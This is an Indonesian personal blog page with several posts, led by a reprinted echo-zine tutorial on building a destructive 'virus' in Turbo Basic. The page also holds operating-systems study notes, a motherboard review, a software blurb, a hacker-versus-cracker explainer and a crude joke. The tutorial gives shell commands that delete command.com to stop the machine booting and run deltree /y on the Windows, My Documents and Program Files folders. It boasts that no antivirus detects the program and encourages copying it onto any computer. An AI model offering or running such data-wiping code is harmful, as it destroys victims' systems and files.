CLICK HERE FOR THOUSANDS OF FREE BLOGGER TEMPLATES »

Minggu, 22 Maret 2009


                  VIRUS
KODOK IJO





- ____________________ ___ ___ ________ --\_ _____/\_ ___ \ / | \\_____ \-- -| __)_ / \ \// ~ \/ | \-- -| \\ \___\ Y / | \-- -/_______ / \______ /\___|_ /\_______ /- - -\/ -\/ -\/ -\/- .OR.ID ECHO-ZINE RELEASE 09 Author: Yogya Family Code || http://www.yogyafree.tk Online @ www.echo.or.id :: http://ezine.echo.or.id


== Cara membuat program perusak (Seperti Virus) ==

Penulis peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis juga
peduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammer
pada langsung lompat ke Pascal, C dan lainnya).

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,
tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,
anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara
membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan
bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.

Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.

Penulis :
Kurniawan
Yogya Family Code
http://www.yogyafree.tk

Salam :
paktani.tk : "Paktani ini saya, hehe"
/conan/ alias markov : "versi 2005 dah keluar lho",
kartubeben : "Inget akukan :P"

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda


Minggu, 18 Januari 2009

Badan Tetap Fit Dikala Kerja


Fit@Work 3D

 Prinsip waktu adalah uang,seakan sudah melekat dalam kehidupan sehari-hari, sehingga untuk meluangkan waktu untuk berolahraga terasa sangat sulit. Padahal olahraga sangat penting bagi kebugaran dan kesehatan tubuh. Apabila Anda lebih sering bekerja dengan komputer, maka dengan bantuan software Fit@- Work, sesibuk apa pun aktivitas kerja, pasti akan sempat untuk melakukan gerakan-gerakan ringan, yang berguna untuk menjaga keadaan fisik tetap bugar dan prima. Ditemani oleh Kim, seorang instruktursenam virtual yang cantik, Anda akan dibimbing beragam senam ringan dan gerakan olahraga yang dapat dilakukan di depan komputer sekalipun. Terdapat sekitar 40 modelsenam yang dapat dipilih, atau biarkan Kim yang akan meman dunya untuk Anda. Bahkan, Kim dapat mengingatkan Anda untuk melakukan senam secara periodik, tergantung setting fungsi reminder-nya. Agar lebih semangat, terdapat software player audio yang terintegrasi, sehingga Anda dapat memutar CD favorit.
Harga: US$25
Info: www.fitatwork

Jumat, 16 Januari 2009

Overclock dengan VGA Onboard

 Tidak ketinggalan dari produsen lain
yang memakai chipset i845G, EPOX kini
juga merilis board yang mengusung
chipset Intel terbaru dengan VGA terintegrasi
di dalamnya.
Sedikit berbeda dengan board P4
lainnya, 4G4A tidak menyediakan konektor
12 volt tambahan. Tegangan 12V
dari jalur utama dirasakan cukup untuk
memenuhi seluruh kebutuhan sistem,
tentunya jika catu daya Anda juga bekerja
dengan baik.
Fasilitas overclocking selalu mendapat
porsi lebih dalam tiap board Epox.
Motherboard ini menyediakan pilihan
tegangan core hingga 0.35 volt lebih
tinggi dari standarnya, serta tegangan
memori hingga 2.7 volt. Selain itu,
tersedia juga pilihan tegangan AGP
hingga 1.9 volt. Walaupun sebenarnya
peningkatan tegangan AGP tidak terlalu
penting, karena sudah tersedia pilihan
clock AGP dan PCI yang tetap, yaitu 66
dan 33 MHz, sehingga card AGP dan PCI
Anda tidak merasa berada dalam keadaan
ter-overclock walaupun prosesor memori
dan chipset berjalan pada FSB yang tidak
standar. Otomatis card AGP tidak membutuhkan
tegangan tambahan.
Jika Anda bukan penggemar overclocking,
fasilitas berikut ini dapat
menjadi pertimbangan Anda dalam
memilih board ini: Sound card onboard 6
channel, software backup Symantec
Norton Ghost 7, dan PCCillin 2000 untuk
perlindungan terhadap virus, serta
sudah tentu VGA terintegrasi yang cukup
memadai bagi berbagai aplikasi, termasuk
game 3D pada resolusi 640x480.
Donovan@CHIP.co.id
Kesimpulan CHIP: Board dengan VGA
terintegrasi yang sangat memperhatikan
kebutuhan overclocker.

Minggu, 13 Juli 2008

Kisi-Kisi Sistem Operasi



KISI-KISI SISTEM OPERASI
Konsep dan Rutinitas dari Page Replacement :
a. Konsep Page Repalcement
Jika tidak ada frame yang kosong, cari frame yang tidak sedang digunakan, lalu kosongkan dengan cara menuliskan isinya ke dalam swap space, dan mengubah semua tabel sebagai indikasi bahwa page tersebut tidak akan berada lama di memori.
b. Rutinitas Page Replacement
- Mencari lokasi page yang diinginkan pada disk.
- Mencari frame yang kosong :
* Jika ada, maka gunakan frame tersebut.
* Jika tidak ada, maka kita bisa mengosongkan frame yang tidak sedang dipakai. Gunakan algoritma pagereplacement untuk menentukan frame yang akan dikosongkan.
* Tulis page yang telah dipilih ke disk, ubah page-table dan frame-table.
- Membaca page yang diinginkan ke dalam frame kosong yang baru.
Trashing, Penyebab Trashing, Membatasi Trashing :
c. Trashing
- Proses menghabiskan waktu lebih banyak untuk paging
daripada eksekusi.
- Proses sibuk untuk melakukan swap-in swap-out.
d. Penyebab
- Rendahnya utilitas dari CPU
Sistem meningkatkan derajat dari multiprogramming
dengan menambahkan proses baru ke sistem.
- Jika derajat dari multiprogramming ditambah terus menerus, utilisasi CPU akan berkurang dengan drastis dan terjadi thrashing.

e. Membatasi Efek Trashing
- Algoritma penggatian lokal atau prioritas
* Proses tersebut tidak dapat mencuri frame dari proses
yang lain.
* Jika proses thrashing, proses tersebut akan berada di antrian untuk melakukan paging yang mana hal ini memakan banyak waktu.
- Menyediakan sebanyak mungkin frame sesuai dengan kebutuhan suatu proses.
Konsep dan contoh berkas, Atribut Berkas, Operasi pada Sistem Berkas :
f. Berkas
Berkas adalah kumpulan informasi berkait yang diberi nama dan direkam pada penyimpanan sekunder.
g. Contoh
• Text file
yaitu urutan karakter yang disusun ke dalam baris-baris.
• Source file
yaitu urutan subroutine dan fungsi, yang nantinya akan dideklarasikan.
• Object file
merupakan urutan byte yang diatur ke dalam blok-blok yang dikenali
oleh linker dari sistem.
• Executable file
adalah rangkaian code section yang dapat dibawa loader ke dalam memori dan dieksekusi.
h. Atribut Berkas
• Nama
merupakan satu-satunya informasi yang tetap dalam bentuk yang bisa dibaca oleh manusia (human-readable form)
• Type
dibutuhkan untuk sistem yang mendukung beberapa type berbeda
• Lokasi
merupakan pointer ke device dan ke lokasi berkas pada device tersebut
• Ukuran (size)
yaitu ukuran berkas pada saat itu, baik dalam byte, huruf, atau pun blok
• Proteksi
adalah informasi mengenai kontrol akses, misalnya siapa saja yang boleh membaca, menulis, dan mengeksekusi berkas
• Waktu, tanggal dan identifikasi pengguna
informasi ini biasanya disimpan untuk:
1. pembuatan berkas,
2. modifikasi terakhir yang dilakukan pada berkas, dan
3. penggunaan terakhir berkas.
i. Operasi pada Berkas
• Membuat sebuah berkas
• Menulis pada sebuah berkas
• Membaca sebuah berkas
• Menempatkan kembali sebuah berkas
• Menghapus sebuah berkas
• Memendekkan berkas
Operasi Pada Direktori
- Mencari file
- Membuat file
- Menghapus file
- Melihat isi direktori
- Ubah nama file
- Traverse file system
- Membuka direktori
- Menutup direktori
- Link & Unlink
Recovery
a. Pemeliharaan harus dijalankan untuk memastikan kegagalan sistem tidak akan terjadi saat kehilangan data atau saat data tidak konsisten
b. Ada 2 jenis pemulihan:
* Pengecekan yang kontinu
* Backup and Restore
DMA, 3 Langkah Transfer DMA
j. DMA
DMA adalah sebuah prosesor khusus (special purpose processor) yang berguna untuk menghindari pembebanan CPU utama oleh program I/O.
k. 3 Langkah Transfer DMA
1. Prosesor menyiapkan DMA transfer dengan menyedia kan data-data dari device, operasi yang akan ditampilkan, alamat memori yang menjadi sumber dan tujuan data, dan banyaknya byte yang di transfer.
2. DMA controller memulai operasi (menyiapkan bus, menyediakan alamat, menulis dan membaca data), sampai seluruh blok sudah di transfer.
3. DMA controller meng-interupsi prosesor, dimana selanjutnya akan ditentukan tindakan berikutnya.
Tujuan Perangkat Lunak
Terdapat dua sasaran perancangan manajemen perangkat lunak I/O :
Efisiensi (eficiency)
Efiensi merupakan aspek penting karena operasi I/O sering merupakan operasi yang menimbulkan bottleneck.
Generalitas (generality)
Manajemen perangkat I/O selain berkaitan dengan simplisitas dan bebas kesalahan, juga menangani perangkat secara seragam baik dari cara proses memandang sistem operasi mengelola perangkat dan operasi I/O. Generalitas disebut juga device independent.
Solusi Bad Block
* Simple format (MS DOS):mencari bad block memberi kode ke FAT entry untuk menggunakan block atau menguncinya.
* Sector sparing (SCSI):mendaftar bad block saat level formatting, menyediakan sektor kosong menggantikan yang rusak.
* Sector slipping: jika menemukan sektor rusak, maka semua data mulai dari sektor tersebut akan digeser maju sampai sektor kosong pertama.
Penyebab Hilangnya Data
1. Ketidaksengajaan dalam menghapus.
Bisa saja pengguna secara tidak sengaja menghapus suatu berkas, hal ini dapat dicegah seminimal mungkin dengan cara melakukan backup data secara reguler.
2. Hilangnya tenaga listrik
Hilangnya tenaga listrik dapat mengakibatkan adanya corrupt data.
3. Blok rusak pada disk.
Rusaknya blok pada disk dapat saja disebabkan dari umur disk tersebut. Seiring dengan waktu, banyaknya blok pada disk yang rusak dapat terus terakumulasi. Blok yang rusak pada disk, tidak akan dapat dibaca
4. Rusaknya Disk.
Bisa saja karena suatu kejadian disk rusak total. Sebagai contoh, dapat saja disk jatuh atau pun
ditendang ketika sedang dibawa.
5. System Corrupt.
Ketika komputer sedang dijalankan, bisa saja terjadi OS error, program error, dan lain sebagainya.
Sekuriti dan 3 bagian sekuriti
l. Sekuriti
Menjamin sumber daya tidak digunakan atau dimodifikasi oleh orang lain yang tidak memiliki otorisasi.
m. 3 Bagian Sekuriti
- Keamanan Eksternal (External Security)
Keamanan eksternal berkaitan dengan pengamanan fasilitas komputer dari penyusup dan bencana seperti kebakaran atau kebanjiran.
- Keamanan Interface Pemakai (User Interface Security)
Keamanan interface pemakai berkaitan dengan identifikasi pemakai sebelum pemakai diijinkan mengakses program dan data yang disimpan.
- Keamanan Internal (Internal Security)
Keamanan internal berkaitan dengan pengamanan beragam kendali yang dibangun pada perangkat keras dan sistem operasi yang menjamin operasi yang handal dan tidak terkorupsi untuk menjaga integritas program dan data.
2 Kategori Ancaman Sistem
n. Program yang memerlukan program inang (Host Program).
Fragmen program tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas atau program sistem.
Contoh : trapdoor, logic bomb, trojan horse, viru
o. Program yang tidak memerlukan program inang (Host Program).
Program sendiri yang dapat dijadwalkan dan dijalankan oleh sistem operasi.
Contoh : bacteria, worm
Kategori keamanan sistem komputer
p. kerahasiaan (secrecy)
kerahasiaan adalah keterjaminan bahwa informasi di sistem komputer hanya dapat diakses oleh pihak – pihak yang diotorisasi dan modifikasi tetap menjaga konsistensi dan keutuhan data di sistem.
q. integritas (integrity)
integritas adalah keterjaminan bahwa sumber daya sistem komputer hanya dapat dimodifikasi oleh pihak yang diotorisasi.
r. ketersediaan (availibility)
ketersediaan adalah keterjaminan bahwa sumber daya sistem komputer tersedia bagi pihak yang diotorisasi saat diperlukan
Kategori ancaman sistem
s. interupsi
sumber daya sistem komputer dihancurkan atau menjadi tidak tersedia/tak berguna. Interupsi merupakan ancaman terhadap ketersediaan.
Contoh : penghancuran bagian perangkat keras, pemotongan kabel
t. intersepsi
pihak tidak diotorisasi dapat mengakses sumber daya. Intersepsi merupakan ancaman terhadap kerahasiaan. Pihak tidak diotorisasi dapat berupa orang atau program komputer.
Contoh : penyadapan untuk mengambil data rahasia
u. modifikasi
pihak tidak diotorisasi tidak hanya mengakses tapi juga merusak sumber daya. Modifikasi merupakan ancaman terhadap integritas.
Contoh : mengubah nilai – nilai file data
v. fabrikasi
pihak tidak diotorisasi menyisipkan / memasukan objek –objek tertentu palsu ke sistem.
Contoh : memasukan pesan palsu ke jaringan, penambahan rekord ke file.
fase siklus hidup virus
- Fase Tidur (dormant phase)
Virus dalam keadaan menganggur. Virus akan tiba – tiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu, kehadiran program atau file tertentu, atau kapasitas disk yang melewati batas.
- Fase propagasi (propagation phase)
Virus menempatkan kopian dirinya ke program lain atau daerah sistem tertentu di disk. Program yang terinfeksi virus akan mempunyai kloning. Kloning virus dapat kembali memasuki fase propagasi.
- Fase pemicuan (triggering phase)
Virus diaktifkan untuk melakukan fungsi tertentu.
- Fase eksekusi (execution phase)
Virus menjalankan fungsinya yaitu menampilkan pesan di layar atau merusak seperti merusak program dan file – file data.

Minggu, 06 Juli 2008

new


Newbie: Penyalahgunaan Kosakata serta Kesalahan-kesalahan yang Kerap Dilakukan oleh Newbie
Kesalahaan pertama yang saya anggap menjengkelkan di sini adalah newbie yang mengaku sebagai newbie ketika bertanya kepada seseorang yang dianggap lebih tahu. Saya merasa menyesal ketika membuka thread saya yang pertama kali pada forum AdSense-Id yang menyatakan saya adalah seorang newbie dan butuh penjelasan mengenai feed. Lalu dengan rasa pakewuh ala Jogja saya pun meminta maaf atas ke-newbie-an saya.

Sederhananya tanpa memberi tahu bahwa seorang newbie adalah newbie, jumlah post serta kualitas pertanyaan dapat menyatakan seberapa derajat seorang user dalam forum. Kesan yang didapat ketika seseorang mengaku sebagai newbie adalah ingin secara instan mendapatkan respon. Mengaku sebagai newbie terkesan ‘memaksa’ orang yang lebih tahu untuk segera memberikan jawaban atas pertanyaan yang mereka ajukan. Newbie adalah orang istimewa, serupa fakir miskin yang patut dikasihani, sehingga mengabaikan newbie bisa ‘berdosa’. Setidaknya itulah anggapan saya tentang newbie yang mengaku newbie.

Nah, yang lebih menjengkelkan adalah expert yang mengaku sebagai newbie. Mengakunya newbie, baru saja membuat website yang katanya “nggak mutu” tetapi setelah dicek ternyata unique visitor berada pada angka 100 per hari! Orang seperti ini terkesan ingin mengetes kemampuan orang lain yang ujung-ujungnya adalah unjuk kemampuan alias pamer alias show off. Padahal hakikatnya sebuah ilmu adalah untuk dibagi dan dikembangkan bersama, bukan sebagai alat pamer kekuatan seseorang yang bertujuan untuk merendahkan orang lain.

Maka melalui artikel ini saya menghimbau [seperti pemerintah] kepada seluruh rekan, kawan, dan teman pemula untuk TIDAK mengaku dirinya sebagai newbie ketika bertanya atau berdiskusi dalam sebuah forum. Adanya forum dan kolom komentar pada blog bukanlah tempat untuk meminta belas kasihan dengan mengaku sebagai newbie, namun sebagai tempat berdiskusi dan menjalin pola interaksi yang positif.

Kita semua berawal dari pemula yang tidak tahu apa-apa, dan membutuhkan proses tersendiri untuk menggenggam dunia. Mari maju bersama tanpa meminta belas kasihan dengan menyalahgunakan kata newbie.

Selasa, 01 Juli 2008

Who is Hacker & Cracker ?


Mungkin anda sudah sering mendengar istilah Hacker & Cracker. Namun, apa yang dimaksud Hacker & Cracker ? Lalu apa perbedaannya ? Perkembangan teknologi yang semakin pesat semakin meningkatnya tingkat kriminalitas yang dilakukan oleh penjahat lewat internet. Seorang penjahat internet tidak tanggung-tanggung menguras habis uang suatu perusahaan hanya dalam hitungan menit melalui internet. Lalu, Siapa Penjahat Internet Tersebut ? Penjahat tersebut disebut dengan istilah "Cracker". Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer. Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.

Jumat, 27 Juni 2008

nYeNgir Dikit aYeee !!!

Suatu hari seorang pria yang merasa putus asa karena sering ditolak cintanya, memutuskan untuk berobat ke seorang dukun, yang katanya hebat itu.

Si Pria : "Kun, gimana caranya supaya gua ganteng dan semua cewe mau ama gue?"
Dukun : "Yah... itu sih gampang. Tapi ada syaratnya, mau ngga"??
Si Pria : "Ya, apapun syaratnya akan saya jalanin Kun"!
Dukun : "Syaratnya "Kamu ngga' boleh pake CD kalo pergi kemana-mana."
Si Pria : "wah....itu sih...kecil"!

Kemudian Si Pria tadi pulang ke rumah, dan segera membuang semua CDnya.

"Keesokan harinya Si Pria tadi bangun kesiangan, padahal hari itu pelajaran Dosen yang paling dangerous".

"Dengan terburu-buru dia langsung mengganti pakaian tidurnya dengan baju yang mengantung di pintu kamarnya".

Sesampainya di Kampus dia binggung kenapa semua orang melihatnya dengan tatapan yang tajam, ada wanita yang sampe mengeluarkan air liurnya, ada yang sampai-sampai matanya mau keluar, dan ada juga yang tersenyum-senyum kecil".

Kemudian dia berfikir sejenak.
"Wah... jangan-jangan ini gara2 anjuran dari si Dukun. Ternyata si Dukun emang hebat.

Nggak berapa lama, salah seorang anak kampus yang rada BETY nyeletuk

"Eh... Jokel, udah anunya kecil (sambil menunjuk ke arah yang dimaksud) pake dipamerin segala lagi. Gue sih... kaga napsuuuuuu."

Kemudian si Pria langsung melihat ke arah yang dimaksud, dan berkata

Si Pria: "OMG (oh......my God)"

Tenyata celana yang dipake bolong...